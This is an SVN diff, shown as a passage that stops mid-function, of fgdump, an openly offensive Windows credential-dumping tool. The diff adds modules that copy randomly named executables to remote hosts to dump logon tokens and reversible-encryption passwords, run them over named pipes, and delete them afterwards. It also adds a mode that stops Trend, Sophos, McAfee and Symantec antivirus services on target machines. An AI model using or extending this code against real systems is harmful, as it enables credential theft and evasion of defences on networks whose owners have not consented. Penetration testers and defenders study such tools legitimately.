Index: fgdump.rc
===================================================================
--- fgdump.rc	(revision 1246)
+++ fgdump.rc	(revision 1355)
@@ -57,6 +57,8 @@
 IDR_CACHEDUMP64         BIN                     "cachedump64.exe"
 IDR_PWDUMP              BIN                     "PwDump.exe"
 IDR_FGEXEC              BIN                     "fgexec.exe"
+IDR_WHOSTHERE           BIN                     "whosthere.exe"
+IDR_REVDUMP             BIN                     "revdump.exe"
 
 /////////////////////////////////////////////////////////////////////////////
 //
Index: pstgdump/Release/pstgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: pstgdump/pstgdump.vcproj
===================================================================
--- pstgdump/pstgdump.vcproj	(revision 1246)
+++ pstgdump/pstgdump.vcproj	(revision 1355)
@@ -1,110 +1,173 @@
 <?xml version="1.0" encoding="Windows-1252"?>
 <VisualStudioProject
 	ProjectType="Visual C++"
-	Version="7.10"
+	Version="9.00"
 	Name="pstgdump"
 	ProjectGUID="{7A87DEAE-7B94-4986-9294-BD69B12A9732}"
-	Keyword="Win32Proj">
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="131072"
+	>
 	<Platforms>
 		<Platform
-			Name="Win32"/>
+			Name="Win32"
+		/>
 	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
 	<Configurations>
 		<Configuration
 			Name="Debug|Win32"
 			OutputDirectory="Debug"
 			IntermediateDirectory="Debug"
 			ConfigurationType="1"
-			CharacterSet="2">
+			InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops"
+			CharacterSet="2"
+			>
 			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
 				Name="VCCLCompilerTool"
 				Optimization="0"
 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
-				MinimalRebuild="TRUE"
+				MinimalRebuild="true"
 				BasicRuntimeChecks="3"
-				RuntimeLibrary="5"
-				UsePrecompiledHeader="3"
+				RuntimeLibrary="1"
+				UsePrecompiledHeader="2"
 				WarningLevel="3"
-				Detect64BitPortabilityProblems="TRUE"
-				DebugInformationFormat="4"/>
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
 			<Tool
-				Name="VCCustomBuildTool"/>
+				Name="VCManagedResourceCompilerTool"
+			/>
 			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
 				Name="VCLinkerTool"
 				AdditionalDependencies="crypt32.lib"
 				OutputFile="$(OutDir)/pstgdump.exe"
 				LinkIncremental="2"
-				GenerateDebugInformation="TRUE"
+				GenerateDebugInformation="true"
 				ProgramDatabaseFile="$(OutDir)/pstgdump.pdb"
 				SubSystem="1"
-				TargetMachine="1"/>
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				TargetMachine="1"
+			/>
 			<Tool
-				Name="VCMIDLTool"/>
+				Name="VCALinkTool"
+			/>
 			<Tool
-				Name="VCPostBuildEventTool"/>
+				Name="VCManifestTool"
+			/>
 			<Tool
-				Name="VCPreBuildEventTool"/>
+				Name="VCXDCMakeTool"
+			/>
 			<Tool
-				Name="VCPreLinkEventTool"/>
+				Name="VCBscMakeTool"
+			/>
 			<Tool
-				Name="VCResourceCompilerTool"/>
+				Name="VCFxCopTool"
+			/>
 			<Tool
-				Name="VCWebServiceProxyGeneratorTool"/>
+				Name="VCAppVerifierTool"
+			/>
 			<Tool
-				Name="VCXMLDataGeneratorTool"/>
-			<Tool
-				Name="VCWebDeploymentTool"/>
-			<Tool
-				Name="VCManagedWrapperGeneratorTool"/>
-			<Tool
-				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+				Name="VCPostBuildEventTool"
+			/>
 		</Configuration>
 		<Configuration
 			Name="Release|Win32"
 			OutputDirectory="Release"
 			IntermediateDirectory="Release"
 			ConfigurationType="1"
-			CharacterSet="2">
+			InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops"
+			CharacterSet="2"
+			>
 			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
 				Name="VCCLCompilerTool"
 				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
-				RuntimeLibrary="4"
-				UsePrecompiledHeader="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
 				WarningLevel="3"
-				Detect64BitPortabilityProblems="TRUE"
-				DebugInformationFormat="3"/>
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
 			<Tool
-				Name="VCCustomBuildTool"/>
+				Name="VCManagedResourceCompilerTool"
+			/>
 			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
 				Name="VCLinkerTool"
 				AdditionalDependencies="crypt32.lib"
 				OutputFile="$(OutDir)/pstgdump.exe"
 				LinkIncremental="1"
-				GenerateDebugInformation="TRUE"
+				GenerateDebugInformation="true"
 				SubSystem="1"
 				OptimizeReferences="2"
 				EnableCOMDATFolding="2"
-				TargetMachine="1"/>
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				TargetMachine="1"
+			/>
 			<Tool
-				Name="VCMIDLTool"/>
+				Name="VCALinkTool"
+			/>
 			<Tool
-				Name="VCPostBuildEventTool"/>
+				Name="VCManifestTool"
+			/>
 			<Tool
-				Name="VCPreBuildEventTool"/>
+				Name="VCXDCMakeTool"
+			/>
 			<Tool
-				Name="VCPreLinkEventTool"/>
+				Name="VCBscMakeTool"
+			/>
 			<Tool
-				Name="VCResourceCompilerTool"/>
+				Name="VCFxCopTool"
+			/>
 			<Tool
-				Name="VCWebServiceProxyGeneratorTool"/>
+				Name="VCAppVerifierTool"
+			/>
 			<Tool
-				Name="VCXMLDataGeneratorTool"/>
-			<Tool
-				Name="VCWebDeploymentTool"/>
-			<Tool
-				Name="VCManagedWrapperGeneratorTool"/>
-			<Tool
-				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+				Name="VCPostBuildEventTool"
+			/>
 		</Configuration>
 	</Configurations>
 	<References>
@@ -113,53 +176,68 @@
 		<Filter
 			Name="Source Files"
 			Filter="cpp;c;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}">
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
 			<File
-				RelativePath=".\ProtectedStorage.cpp">
+				RelativePath=".\ProtectedStorage.cpp"
+				>
 			</File>
 			<File
-				RelativePath=".\pstgdump.cpp">
+				RelativePath=".\pstgdump.cpp"
+				>
 			</File>
 			<File
-				RelativePath=".\stdafx.cpp">
+				RelativePath=".\stdafx.cpp"
+				>
 				<FileConfiguration
-					Name="Debug|Win32">
+					Name="Debug|Win32"
+					>
 					<Tool
 						Name="VCCLCompilerTool"
-						UsePrecompiledHeader="1"/>
+						UsePrecompiledHeader="1"
+					/>
 				</FileConfiguration>
 				<FileConfiguration
-					Name="Release|Win32">
+					Name="Release|Win32"
+					>
 					<Tool
 						Name="VCCLCompilerTool"
-						UsePrecompiledHeader="1"/>
+						UsePrecompiledHeader="1"
+					/>
 				</FileConfiguration>
 			</File>
 			<File
-				RelativePath=".\XGetopt.cpp">
+				RelativePath=".\XGetopt.cpp"
+				>
 			</File>
 		</Filter>
 		<Filter
 			Name="Header Files"
 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}">
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
 			<File
-				RelativePath=".\ProtectedStorage.h">
+				RelativePath=".\ProtectedStorage.h"
+				>
 			</File>
 			<File
-				RelativePath=".\debug\pstorec.tlh">
+				RelativePath=".\debug\pstorec.tlh"
+				>
 			</File>
 			<File
-				RelativePath=".\stdafx.h">
+				RelativePath=".\stdafx.h"
+				>
 			</File>
 			<File
-				RelativePath=".\XGetopt.h">
+				RelativePath=".\XGetopt.h"
+				>
 			</File>
 		</Filter>
 		<Filter
 			Name="Resource Files"
 			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx"
-			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}">
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
 		</Filter>
 	</Files>
 	<Globals>
Index: pstgdump/Debug/pstgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: fgdump.cpp
===================================================================
--- fgdump.cpp	(revision 1246)
+++ fgdump.cpp	(revision 1355)
@@ -33,6 +33,8 @@
 	bFullRun = true;
 	bRunPwdump = true;
 	bRunCachedump = true;
+	bRunWhosThere = false;
+	bRunRevDump = false;
 	bRunPStgDump = false;
 	bSkipExisting = true;
 	bContinueOnUnknownAV = false;
@@ -50,6 +52,7 @@
 	bSkipPwdumpHistory = false;
 	bRunLocal = false;
 	bSkipAVCheck = false;
+	bToggleAV = false;
 	nOSBits = 0;	// OS 32/64 flag has not been overridden
 
 	memset(lpszSourceFile, 0, MAX_PATH + 1);
@@ -120,6 +123,12 @@
 	bFullRun = !bTestOnly;
 }
 
+void FGDump::SetToggleOnlyAV(bool bToggleOnly)
+{
+	bToggleAV = bToggleOnly;
+	bFullRun = false;
+}
+
 void FGDump::SetSkipCacheDump(bool bSkip)
 {
 	bRunCachedump = !bSkip;
@@ -129,7 +138,17 @@
 {
 	bRunPwdump = !bSkip;
 }
+void FGDump::SetSkipWhosThere(bool bSkip)
+{
+	bRunWhosThere = !bSkip;
+}
 
+void FGDump::SetSkipRevDump(bool bSkip)
+{
+	bRunRevDump = !bSkip;
+}
+
+
 void FGDump::SetSkipProtectedStorageDump(bool bSkip)
 {
 	bRunPStgDump = !bSkip;
@@ -201,7 +220,7 @@
 {
 	ResourceLoader objResPWDump, objResFGExec;
 	ResourceLoader objLSADump, objResCacheDump, objResPStgDump;
-	ResourceLoader objResCacheDump64;
+	ResourceLoader objResCacheDump64, objResWhosThere, objResRevDump;
 	size_t nLen;
 	FILE* fileInput = NULL;
 	char szPwdTemp[101];
@@ -259,7 +278,7 @@
 		SetPassword(szPwdTemp);
 	}
 
-	if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true)
+	if ((bRunCachedump == false && bRunPwdump == false && bRunWhosThere == false && bRunRevDump == false) && bFullRun == true)
 	{
 		Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n");
 		ExitApp(1);
@@ -299,6 +318,8 @@
     memset(lpszPWDumpPath, 0, MAX_PATH + 15);
 	memset(lpszFGExecPath, 0, MAX_PATH + 15);
 	memset(lpszCacheDumpPath, 0, MAX_PATH + 15);
+	memset(lpszWhosTherePath, 0, MAX_PATH + 15);
+	memset(lpszRevDumpPath, 0, MAX_PATH + 15);
 	memset(lpszPStoragePath, 0, MAX_PATH + 15);
 	memset(lpszCacheDump64Path, 0, MAX_PATH + 15);
 
@@ -308,12 +329,18 @@
 	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
 	temp = lpszFgExecExeName;
 	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
+	temp = lpszWhosThereExeName;
+	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
+	temp = lpszRevDumpExeName;
+	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
 
 	_snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe");
 	_snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszFgExecExeName);
 	_snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDumpExeName);
 	_snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe");
 	_snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDump64ExeName);
+	_snprintf(lpszWhosTherePath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszWhosThereExeName);
+	_snprintf(lpszRevDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszRevDumpExeName);
 
 	// If antivirus is running locally, turn it off, since it may disrupt the storage
 	// of the worker files locally. Only do this if the user hasn't disabled it.
@@ -349,6 +376,10 @@
 		ExitApp(1);
 	if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path))
 		ExitApp(1);
+	if (!objResWhosThere.UnpackResource(IDR_WHOSTHERE, lpszWhosTherePath))
+		ExitApp(1);
+	if (!objResRevDump.UnpackResource(IDR_REVDUMP, lpszRevDumpPath))
+		ExitApp(1);
 
 	// Set up the thread pool
 	CreateThreadPool();
Index: RevDumpControl.h
===================================================================
--- RevDumpControl.h	(revision 0)
+++ RevDumpControl.h	(revision 1355)
@@ -0,0 +1,37 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2010 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#pragma once
+#ifndef _REVDUMPCONTROL_H
+#define _REVDUMPCONTROL_H
+
+class RevDumpControl
+{
+public:
+	RevDumpControl(LONG nCacheID = -1);
+	~RevDumpControl(void);
+
+	bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL);
+
+private:
+	LONG m_nCacheID;
+
+};
+
+#endif
\ No newline at end of file
Index: HostDumper.cpp
===================================================================
--- HostDumper.cpp	(revision 1246)
+++ HostDumper.cpp	(revision 1355)
@@ -20,6 +20,8 @@
 #include "StdAfx.h"
 #include "hostdumper.h"
 #include "CacheDumpControl.h"
+#include "WhosThereControl.h"
+#include "RevDumpControl.h"
 #include "ProtectedStorageControl.h"
 #include "ServiceControl.h"
 #include "Impersonator.h"
@@ -81,7 +83,7 @@
 	PWDumpControl objPWDump(nCacheID);
 	Impersonator impersonate(nCacheID);
 	char szPath[MAX_PATH + 1];
-	bool bSkipPwdump = false, bSkipCachedump = false, bSkipPStg = true;
+	bool bSkipPwdump = false, bSkipCachedump = false, bSkipWhosThere = false, bSkipPStg = true, bSkipRevDump = false;
 	char* szWindowsVersion;
 	GUID guidPipe;
 	WCHAR wszGUID[CHARS_IN_GUID + 1];
@@ -121,12 +123,24 @@
 			Log.CachedReportError(nCacheID, INFO, "INFO: skipping cachedump on %s because %s exists or I was told to skip cache dumps\n", lpszServer, szPath);
 
 		memset(szPath, 0, MAX_PATH + 1);
+		_snprintf(szPath, MAX_PATH, "%s.whosthere", lpszServer);
+		bSkipWhosThere = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunWhosThere;
+		if (bSkipWhosThere)
+			Log.CachedReportError(nCacheID, INFO, "INFO: skipping token dump on %s because %s exists or I was told to skip token dumps\n", lpszServer, szPath);
+
+		memset(szPath, 0, MAX_PATH + 1);
+		_snprintf(szPath, MAX_PATH, "%s.revdump", lpszServer);
+		bSkipRevDump = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunRevDump;
+		if (bSkipRevDump)
+			Log.CachedReportError(nCacheID, INFO, "INFO: skipping reversible encryption value dump on %s because %s exists or I was told to skip reversible encryption dumps\n", lpszServer, szPath);
+
+		memset(szPath, 0, MAX_PATH + 1);
 		_snprintf(szPath, MAX_PATH, "%s.lsadump", lpszServer);
 		bSkipPStg = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunPStgDump;
 		if (bSkipPStg)
 			Log.CachedReportError(nCacheID, INFO, "INFO: skipping dump of protected storage secrets on %s because %s exists or I was told to skip LSA dumps\n", lpszServer, szPath);
 
-		if (bSkipCachedump && bSkipPwdump && bSkipPStg)
+		if (bSkipCachedump && bSkipPwdump && bSkipWhosThere && bSkipPStg && bSkipRevDump)
 		{
 			Log.CachedReportError(nCacheID, CRITICAL, "Skipping: nothing to do\n");
 			LogFailed.WriteFailedHost(lpszServer, FGDUMP_ERROR_BASE + 1, false, "Skipping: nothing to do");
@@ -220,10 +234,19 @@
 				switch(sControls.objTrendService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Trend is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bTrendAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bTrendAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Trend is running on this machine, shutting it down for a bit...\n");
@@ -232,6 +255,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Trend AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bTrendAVIsRunning = false;
 					}
 					else
 					{
@@ -259,10 +285,19 @@
 				switch(sControls.objSophosService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Sophos is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bSophosAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bSophosAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Sophos is running on this machine, shutting it down for a bit...\n");
@@ -271,6 +306,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Sophos AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bSophosAVIsRunning = false;
 					}
 					else
 					{
@@ -298,10 +336,19 @@
 				switch(sControls.objMcAfeeService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "McAfee is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bMCAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bMCAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "McAfee is running on this machine, shutting it down for a bit...\n");
@@ -310,6 +357,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "McAfee AV was running but could not be stopped");
 							throw(1);
 						}
+						
+						if (fgdumpMain->bToggleAV)
+							bSymantecAVIsRunning = false;
 					}
 					else
 					{
@@ -337,10 +387,19 @@
 				switch(sControls.objSAVService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Symantec is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bSymantecAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+						
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bSymantecAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Symantec is running on this machine, shutting it down for a bit...\n");
@@ -349,6 +408,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Symantec AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bSymantecAVIsRunning = false;
 					}
 					else
 					{
@@ -416,6 +478,42 @@
 				}
 			}
 
+			if (!bSkipWhosThere)
+			{
+				if (bRunLocal)
+				{
+					if (RunWhosThere(fgdumpMain->lpszTempPath) == false) // Don't want a pipe for local stuff
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log");
+					}
+				}
+				else
+				{
+					if (RunWhosThere(fgdumpMain->lpszTempPath, lpszPipeName) == false)
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log");
+					}
+				}
+			}
+
+			if (!bSkipRevDump)
+			{
+				if (bRunLocal)
+				{
+					if (RunRevDump(fgdumpMain->lpszTempPath, NULL) == false) // Don't want a pipe for local stuff
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log");
+					}
+				}
+				else
+				{
+					if (RunRevDump(fgdumpMain->lpszTempPath, lpszPipeName) == false)
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log");
+					}
+				}
+			}
+
 			if (!bSkipPStg)
 			{
 				if (RunProtectedStorageDump(fgdumpMain->lpszTempPath, lpszUser, lpszPassword, lpszPipeName) == false)
@@ -630,6 +728,10 @@
 	DeleteFile(lpszRemotePath);
 	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszCacheDump64ExeName);
 	DeleteFile(lpszRemotePath);
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName);
+	DeleteFile(lpszRemotePath);
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName);
+	DeleteFile(lpszRemotePath);
 	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszFgExecExeName);
 	DeleteFile(lpszRemotePath);
 
@@ -652,6 +754,38 @@
 	return true;
 }
 
+bool HostDumper::RunWhosThere(char* lpszTempPath, char* lpszPipeName)
+{
+	WhosThereControl objWhosThere(nCacheID);
+
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName);
+	CopyFile(fgdumpMain->lpszWhosTherePath, lpszRemotePath, FALSE);
+
+	if (!objWhosThere.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszWhosThereExeName, lpszPipeName))
+	{
+		Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump logon tokens\n");
+		return false;
+	}
+
+	return true;
+}
+
+bool HostDumper::RunRevDump(char* lpszTempPath, char* lpszPipeName)
+{
+	RevDumpControl objRevDump(nCacheID);
+
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName);
+	CopyFile(fgdumpMain->lpszRevDumpPath, lpszRemotePath, FALSE);
+
+	if (!objRevDump.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszRevDumpExeName, lpszPipeName))
+	{
+		Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump reversible encryption values\n");
+		return false;
+	}
+
+	return true;
+}
+
 bool HostDumper::RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName)
 {
 	ProtectedStorageControl objPStgDump(nCacheID);
Index: fgdump.vcproj
===================================================================
--- fgdump.vcproj	(revision 1246)
+++ fgdump.vcproj	(revision 1355)
@@ -249,6 +249,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\RevDumpControl.cpp"
+				>
+			</File>
+			<File
 				RelativePath=".\ServiceControl.cpp"
 				>
 			</File>
@@ -293,6 +297,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\WhosThereControl.cpp"
+				>
+			</File>
+			<File
 				RelativePath=".\XGetopt.cpp"
 				>
 			</File>
@@ -375,6 +383,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\RevDumpControl.h"
+				>
+			</File>
+			<File
 				RelativePath=".\ServiceControl.h"
 				>
 			</File>
@@ -403,6 +415,10 @@
 				>
 			</File>
 			<File
+				RelativePath=".\WhosThereControl.h"
+				>
+			</File>
+			<File
 				RelativePath=".\XGetopt.h"
 				>
 			</File>
@@ -466,6 +482,10 @@
 			>
 		</File>
 		<File
+			RelativePath=".\revdump.exe"
+			>
+		</File>
+		<File
 			RelativePath=".\servpw.exe"
 			>
 		</File>
@@ -473,6 +493,10 @@
 			RelativePath=".\servpw64.exe"
 			>
 		</File>
+		<File
+			RelativePath=".\whosthere.exe"
+			>
+		</File>
 	</Files>
 	<Globals>
 	</Globals>
Index: fgexec/Release/fgexec.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: fgexec/Debug/fgexec.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: RevDumpControl.cpp
===================================================================
--- RevDumpControl.cpp	(revision 0)
+++ RevDumpControl.cpp	(revision 1355)
@@ -0,0 +1,136 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2010 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#include "StdAfx.h"
+#include "RevDumpControl.h"
+#include "Process.h"
+
+RevDumpControl::RevDumpControl(LONG nCacheID)
+{
+	m_nCacheID = nCacheID;
+}
+
+
+RevDumpControl::~RevDumpControl(void)
+{
+
+}
+
+bool RevDumpControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName)
+{
+	char* lpszCmdLineFormat;
+	int nArgSize;
+	char* lpszStopCmdLine;
+	char* lpszParams;
+	bool result = false;
+	
+	if (lpszPipeName == NULL)
+	{
+		// Set the local RevDump path
+		lpszCmdLineFormat = "%s\\%s";
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+		lpszStopCmdLine = new char[nArgSize + 1];
+		memset(lpszStopCmdLine, 0, nArgSize + 1);
+		_snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName);
+
+		// Now set the parameters
+		lpszCmdLineFormat = " -l";
+		nArgSize = strlen(lpszCmdLineFormat);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat);
+	}
+	else
+	{
+		lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1];
+		memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1);
+		strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath));
+
+		lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l";
+
+		nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+		lpszParams = new char[nArgSize + 1];
+		memset(lpszParams, 0, nArgSize + 1);
+		_snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName);
+	}
+
+	try
+	{
